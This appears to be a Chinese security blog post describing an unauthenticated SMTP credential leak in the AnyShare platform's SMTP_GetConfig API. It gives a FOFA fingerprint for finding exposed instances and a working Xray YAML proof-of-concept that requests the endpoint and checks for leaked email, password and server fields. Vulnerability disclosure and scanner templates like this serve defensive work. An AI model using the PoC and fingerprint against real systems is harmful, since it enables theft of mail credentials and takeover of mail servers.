AnyShare智能内容管理平台 SMTP_GetConfig 信息泄露漏洞

  参考链接:

https://mp.weixin.qq.com/s/KoAku-zy10RkwyMQVUuv6g

漏洞介绍:

AnyShare智能内容管理平台/SMTP GetConfg 接口未做好权限管控同时响应数据存在过度返回导致接口泄露smtp服务器用户名密码,攻击者可利用此漏洞实现smtp接管。

 

资产指纹:

 app="AISHU-AnyShare"

 Xray-poc:

 

复制代码
name: poc-yaml-anyshare-content-cms-smtpgetconfig-leak
transport: http
rules:
  r0:
    request:
      method: POST
      path: /api/ShareMgnt/SMTP_GetConfig
      follow_redirects: false
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.status == 200 && response.body_string.contains("email\":") && response.body_string.contains("password\":") && response.body_string.contains("server\":") && response.body_string.contains("port\":")
expression: r0()
detail:
  author: Cysec
  links:
    - https://mp.weixin.qq.com/s/KoAku-zy10RkwyMQVUuv6g
  description: AnyShare智能内容管理平台 SMTP_GetConfig 信息泄露漏洞
  fofakeywords: app="AISHU-AnyShare"
复制代码

 

posted @   Cysec  阅读(15)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示